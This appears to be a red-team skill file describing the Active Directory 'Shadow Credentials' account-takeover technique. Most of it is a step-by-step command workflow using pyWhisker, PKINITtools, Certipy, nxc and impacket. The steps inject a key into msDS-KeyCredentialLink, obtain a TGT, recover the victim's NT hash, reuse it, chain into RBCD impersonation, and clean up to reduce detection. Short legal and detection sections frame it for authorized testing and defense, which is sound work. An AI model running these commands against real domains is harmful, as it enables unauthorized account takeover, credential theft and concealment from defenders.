| name | abusing-shadow-credentials-for-privesc |
| description | Take over Active Directory user and computer accounts by writing alternate certificate keys to msDS-KeyCredentialLink (Shadow Credentials) with pyWhisker, Whisker, and Certipy, then authenticate via PKINIT. |
| domain | cybersecurity |
| subdomain | red-teaming |
| tags | ["red-team","active-directory","shadow-credentials","pywhisker","certipy","pkinit","key-credential-link","privilege-escalation"] |
| version | 1.0 |
| author | mahipal |
| license | Apache-2.0 |
| nist_csf | ["PR.AA-05"] |
| mitre_attack | ["T1098.005"] |
Abusing Shadow Credentials for Privilege Escalation
Legal Notice: This skill is for authorized security testing and educational purposes only. Shadow Credentials grant full takeover of the targeted account. Use only against systems you own or are explicitly authorized in writing to test. Unauthorized access is a crime.
Overview
The Shadow Credentials technique abuses the msDS-KeyCredentialLink attribute of Active Directory user and computer objects. This attribute stores raw public keys ("Key Credentials") used by Windows Hello for Business and Azure AD device registration for passwordless certificate-based logon via PKINIT (Public Key Cryptography for Initial Authentication in Kerberos). If an attacker has write permission over a target object's msDS-KeyCredentialLink — typically granted by GenericWrite, GenericAll, WriteProperty, or AddKeyCredentialLink ACEs surfaced in BloodHound — they can append their own attacker-generated public key. They then request a TGT for the target via PKINIT using the matching private key and recover the target's NT hash, achieving complete account takeover without resetting the password, which is far stealthier than a forced password reset.
The technique was published by Elad Shamir ("Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover") and implemented in the C# tool Whisker. The Python equivalent pyWhisker (ShutdownRepo) manipulates the attribute over LDAP, and Certipy integrates the entire chain via certipy shadow auto. The target environment must support PKINIT and have at least one Domain Controller running Windows Server 2016 or later. Sources: pyWhisker, Whisker, The Hacker Recipes — Shadow Credentials.
When to Use
- When BloodHound reveals
GenericWrite/GenericAll/AddKeyCredentialLink over a higher-value user or computer
- As a stealthier alternative to
ForceChangePassword (no password reset = less disruption/alerting)
- To take over a computer account to chain into Resource-Based Constrained Delegation (RBCD)
- During red-team operations needing account takeover without locking out the legitimate user
- For purple-team exercises generating
msDS-KeyCredentialLink modification telemetry
Prerequisites
Objectives
- Confirm write access over a target's
msDS-KeyCredentialLink
- Generate a key pair and append a Key Credential to the target object
- Request a TGT for the target via PKINIT using the new key
- Recover the target's NT hash for pass-the-hash / further movement
- Clean up the injected Key Credential to restore the object's state
- Document the ACL path that enabled the attack for remediation
MITRE ATT&CK Mapping
| ID | Technique | Application in this skill |
|---|
| T1098.005 | Account Manipulation: Device Registration | Writing an attacker-controlled Key Credential (device key) to msDS-KeyCredentialLink to register an alternate authentication credential for the target account |
Workflow
Step 1: Confirm the write primitive
List existing Key Credentials on the target to verify you have the required access. An empty or readable result confirms write access for the add step.
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "list"
Step 2: Add a Shadow Credential with pyWhisker
Generate a certificate/key pair and write it into the target's msDS-KeyCredentialLink. pyWhisker outputs a PFX you control.
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "add" --filename victim_shadow
Use Kerberos auth instead of a password if you only hold a ticket:
python3 pywhisker.py -d "corp.local" -u "attacker" -k --no-pass \
--target "victim" --action "add" --filename victim_shadow --use-ldaps
Step 3: Request a TGT via PKINIT
Use the generated PFX with PKINITtools to obtain a Kerberos TGT for the target.
python3 PKINITtools/gettgtpkinit.py \
-cert-pfx victim_shadow.pfx -pfx-pass <PFX_PASSWORD> \
corp.local/victim victim.ccache
Step 4: Recover the NT hash
Extract the target's NT hash from the AS-REP using the session key from Step 3 (getnthash.py reads the AS-REP encryption key, displayed by gettgtpkinit.py).
export KRB5CCNAME=victim.ccache
python3 PKINITtools/getnthash.py -key <AS-REP-KEY-FROM-STEP-3> corp.local/victim
Step 5: One-shot alternative with Certipy
Certipy's shadow auto performs add → PKINIT → dump hash → cleanup automatically, which is ideal for computer-account takeover.
certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'victim'
certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'WS01$'
Step 6: Use the recovered credential
Authenticate with the NT hash (or the TGT) to continue the engagement.
nxc smb 10.0.0.10 -u victim -H <RECOVERED-NT-HASH>
export KRB5CCNAME=victim.ccache
nxc smb dc.corp.local -u victim --use-kcache
Step 7: Chain computer takeover into RBCD (optional)
When the target is a computer, the recovered key/hash lets you configure Resource-Based Constrained Delegation to impersonate any user to that host.
impacket-rbcd -delegate-from 'attacker$' -delegate-to 'WS01$' \
-action write 'corp.local/attacker:Passw0rd!'
Step 8: Clean up
Remove the injected Key Credential to restore the object and reduce detection footprint.
python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
--target "victim" --action "remove" --device-id <DEVICE-ID>
certipy shadow clear -u 'attacker@corp.local' -p 'Passw0rd!' \
-dc-ip 10.0.0.100 -account 'victim'
Tools and Resources
Detection and Remediation Notes
| Area | Guidance |
|---|
| Detection | Monitor Windows Security Event ID 5136 (directory object modified) for changes to msDS-KeyCredentialLink; alert when a non-AD-Connect/non-Intune principal writes the attribute. |
| Auditing | Enable directory service object change auditing on user/computer OUs. |
| Least privilege | Remove unnecessary GenericWrite/GenericAll/AddKeyCredentialLink ACEs (BloodHound AddKeyCredentialLink edge). |
| Mitigation | Where Windows Hello/device registration is unused, restrict who can write Key Credentials and consider tier-0 protected accounts. |
Validation Criteria